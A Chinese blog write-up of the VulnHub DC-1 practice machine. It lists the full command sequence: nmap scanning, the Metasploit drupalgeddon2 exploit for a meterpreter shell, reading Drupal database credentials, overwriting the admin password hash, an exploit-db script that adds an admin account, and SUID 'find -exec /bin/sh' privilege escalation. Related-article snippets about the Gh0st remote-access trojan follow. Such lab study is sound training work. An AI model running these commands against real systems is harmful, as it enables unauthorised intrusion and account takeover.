VulnHub 靶机学习No.3 DC-1

最新推荐文章于 2024-02-07 22:44:15 发布
最新推荐文章于 2024-02-07 22:44:15 发布
阅读量239 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gh0stf1re/article/details/108875132
版权

本篇博客的主要内容

VulnHub 靶机学习No.3 DC-1

靶机运行说明

  • 靶机难度:初级
  • 攻击机:kali linux,ip地址:192.168.56.102
  • 靶机:DC-1,IP地址:192.168.56.107
  • 目标:找到5个flag

信息收集

nmap扫描kali所在C段,得到DC-1的ip为192.168.56.107
在这里插入图片描述
对192.168.56.107进行全端口扫描

nmap -sV -p 1-65535 192.168.56.107

在这里插入图片描述
既然开放了http服务,使用whatweb探测一下,发现其使用了drupal 7
在这里插入图片描述
打开msf,搜索drupal存在的exp

msfconsole
search drupal

在这里插入图片描述
逐个尝试列表中的exp,发现 exploit/unix/webapp/drupal_drupalgeddon2可以成功利用,并成功返回一个meterpreter shell

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.56.107
set lhost 192.168.56.102
run

在这里插入图片描述
当前用户为www-data,发现flag1
在这里插入图片描述

每一个好的cms都需要一个配置文件 - and so do you

百度得知drupal的配置文件位于/sites/default/settings.php
使用 python 调用本地shell

python -c 'import pty; pty.spawn("/bin/bash")'

在配置文件中发现了flag2 以及数据库用户名、密码
在这里插入图片描述

爆破并不是拿到访问权限的唯一方法,(你需要访问权限)。你会用这些凭证做什么?

既然有数据库用户名、密码,那就登录数据库看看

mysql -u dbuser -p

在这里插入图片描述
可以看到admin的密码并不是普通的md5
这时候这样几个思路:

  • 利用john爆破
  • 替换admin的密码
  • 添加一个与 admin 相同权限的用户
    方法1:使用 john 进行爆破,不过没有跑出来

方法2: 新注册一个普通用户,然后进入数据库,用普通用户的密码hash串替换admin的密码hash串。
尝试注册,但是看来需要admin审批,没有收到邮件(行不通哈哈)
在这里插入图片描述
方法3:使用drupal特有的密码变更方法
可以参考这一篇:https://blog.csdn.net/weixin_30632089/article/details/97793608
在网站根目录下

php script/password-hash.sh 123456

得到新的 123456 加密后的 hash 串
在这里插入图片描述
然后在mysql中进行替换

update users set pass="你得到的 hash 串" where uid=1;

在这里插入图片描述

方法4:利用drupal的漏洞添加一个管理员账户
参考文章:https://www.cnblogs.com/sn1per/p/11950864.html
查看drupal的具体版本

cat /var/www/includes/bootstrap.inc | grep VERSION

得知drupal的版本为7.24
在这里插入图片描述

searchsploit drupal 7

可以看到7.0-7.31存在sql注入,可以用来添加管理员账户
在这里插入图片描述

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.107 -u ttt -p ttt

成功添加一个 ttt/ttt 的管理员用户
在这里插入图片描述

利用 admin/123456 或者 ttt/ttt 成功登录网站后台,得到flag3
在这里插入图片描述

特殊的权限将会找到密码(这里find使用了大写,是在提示我们),但是你需要使用 -exec 命令来解决如何得到shadow中密码的问题

在这里插入图片描述
通过/etc/passwd 可以发现一个flag4用户(这名字也取得太直接了),成功拿到flag4
在这里插入图片描述

提权

按照flag3中的提示,利用find来提权

touch biubiu
find / -name biubiu -exec '/bin/sh' \;

在这里插入图片描述
如果没有提示使用find来提权:
kali新开一个终端,利用python开启http服务

python -m SimpleHTTPServer 8000

在这里插入图片描述

在拿到shell的终端,cd /tmp ,下载kali机上的LinEnum,加权限,执行

cd /tmp
wget http://192.168.56.107:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

输出结果中也指出了find
在这里插入图片描述

知识点总结

  • drupal cms 的拿shell 方法
  • suid 提权

参考链接:

https://blog.csdn.net/weixin_30632089/article/details/97793608
https://www.cnblogs.com/sn1per/p/11950864.html

gh0stf1re
关注
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 959
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
vulnhub DC-1 靶机
FourthGuy的博客
05-03 609
打开我们的kali linux 和 DC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7833
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
关于一款开源远程控制软件(gh0st)的源码分析(一)
weixin_39380632的博客
02-04 5137
2020年注定是不平凡的一年,前有冠状病毒的肆虐,全国上下都笼罩在一种紧张而又不安的氛围中,后有20200202这个千年难得一遇的对称时刻,朋友圈便充斥着各种祝福与童年回忆。正是因为这百年难得一遇的超长假期,才能让我有精力和时间去分析那些静静地躺在我电脑磁盘里的开源软件的源码。 gh0st这款开源软件,主要的用途是用于远程操作另一台计算机(包括远程文件的拷贝、远程视频连接),功能有点类似于QQ中的...
Gh0st通信协议解析(1)
ccnyou的专栏
06-08 1万+
原文来自:http://blog.renren.com/blog/bp/Q78BR_Gw0x ,有改动 界面篇等我先搞完这个通信协议解析再说,要不我老觉得自己是在扯淡。在这里我也给自己这两天搞的协议解析找个网络存储做一下备份。 Gh0st通信协议解析(1) 正所谓蛇打七寸,今天我们对gh0st的通信协议进行一个完整的解析,看看gh0st这款远控的核心技术的来龙去脉。
警惕免杀版Gh0st木马!
sash1mi
05-04 1481
经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免杀马爱好者的下载使用!加强软件下载的安全管理:我们需要加强对开源工具安全的管理和控制,例如在下载前注意审查该开源工具的源码、检查其依赖项、建立安全审查和评估机制等,以减少投毒事件的风险。断开与攻击源的连接:立即断开与该工具的连接,以防止攻击者继续操纵和控制终端;然后需要立即删除相关文件并清理系统。排查安装有该后门软件的主机,及时清理。
gh0st远程控制——客户端界面编写(三)
最新发布
Tandy12356_的博客
02-07 440
为主控端界面添加右键弹出菜单的功能
VulnHub 靶机学习No.6 Bulldog
gh0stf1re的博客
10-03 316
本篇博客的主要内容VulnHub 靶机学习No.6 Bulldog靶机运行说明信息收集利用 bash 弹shell提权知识点总结参考链接: VulnHub 靶机学习No.6 Bulldog 靶机运行说明 靶机难度初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-4,IP地址:192.168.56.101 目标:找到终极flag 信息收集 BullDog 靶机直接显示了IP地址:192.168.56.101 使用 nmap 对其进行全端口扫描 nmap -s
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5951
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Gh0St3.75,支持win7、win8、64位屏幕,目前碰过最好的版本
06-01
目前最好的一般版本,支持代理,3389,更新,端口映射等等各种,功能最强大的一个版本,bin文件。
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1656
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4802
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 617
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
基于C++6.0的Gh0st远控源码研究及在VS2019下的编译修正和测试
wh445306
10-07 3068
简单看了一下整个程序的流程。代码量不多也不少,该有的功能都有,不该有的功能也基本都删除了,对宿主机器有破坏性的东西基本都剔除掉了,只剩下远控和群集化管理功能。说实话 ,代码值得学习的地方真的很多。把这个东西完全研究透肯定会收获良多。代码不复杂,简单清爽、架构合理、设计精巧、性能优良,特别是主控端的IOCP完成端口高负载设计理论和实现方法真的Perfect!感觉比灰鸽子要强,远控直接可以粘贴复杂,传文件支持拖放操作。屏幕控制模块代码结构清爽优质,性能在近15年以后的现在来说有点儿Low low 滴了。
Gh0st源码分析(一)——Ghost简介和编译
张小方的博客
11-30 268
全部编译成功后,在gh0st\Output\Debug\bin目录下会生成Gh0st.exe和svchost.exe,先启动Gh0st.exe,再启动svchost.exe就可以对运行了svchost.exe的机器进行远程控制了。虽然,很多做法在新的操作系统中已经过时或者没有必要,但是其软件的架构原理、过杀毒软件的设计思路和许多经典的做法,非常值得我们学习,尤其是对Windows客户端开发的朋友来说,绝对是提高内功的优秀学习资料。注意的是:这是一款类似于木马性质的软件,请勿作任何非法用途,否则后果自负!
Gh0st整理资料1
热门推荐
_Witch__的专栏
08-12 2万+
题首 Gh0st是一款开源的远程控制软件。界面友好,性能高效。网上流传很多版本,比如红狼,饭客,败笔,大灰狼版本以及多如牛毛的个人修改的如外星人,Drat等个人修改版本。但内核都是基于Gh0st3.6修改而成的。       Gh0st3.6下载地址见 http://huaidan.org/archives/2010.html 截止今天(2013年8月12日11:03:29),我能找到的
Gh0st源代码详细剖析
liujiayu2的专栏
05-28 4011
声明: 首先声明,这篇文章完全是根据自己对gh0st源代码的理解写出来的,如果有理解上的偏差或者表述上的错误本人不负责,仅供参考! 前言: 在我刚学习gh0st源代码的时候,觉得这东西好难,三个工程放在一起不说,还有那么多文件,当时就懵了。这怎么看呢?从何下手呢?我想大部分刚学习gh0st源代码的同胞们都有和我一样的想法,我废话不多说了,下面就为大家详细讲解gh0st源代码。
gh0st远程控制——客户端界面编写(一)
Tandy12356_的博客
01-19 679
解决方案:在窗口初始化的函数OnInitDlg()函数当中添加额外代码,产生WM_SIZE消息,这样我们的WM_SIZE消息处理函数就会去修正窗口大小,这样最终窗口显示出来的时候就已经被修正了。分别为2个对话框添加列表控件变量:m_CList_Online;但是我们随窗口修正的窗口和一开始初始化时候的窗口不一致,怎么解决?转到类视图 》点击CPCRemoteDlg 》右键属性 》为对话框添加WM_SIZE消息的消息处理函数。1、新建一个基于对话框的MFC程序。4、使列表框随着对话框的大小同步伸缩。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值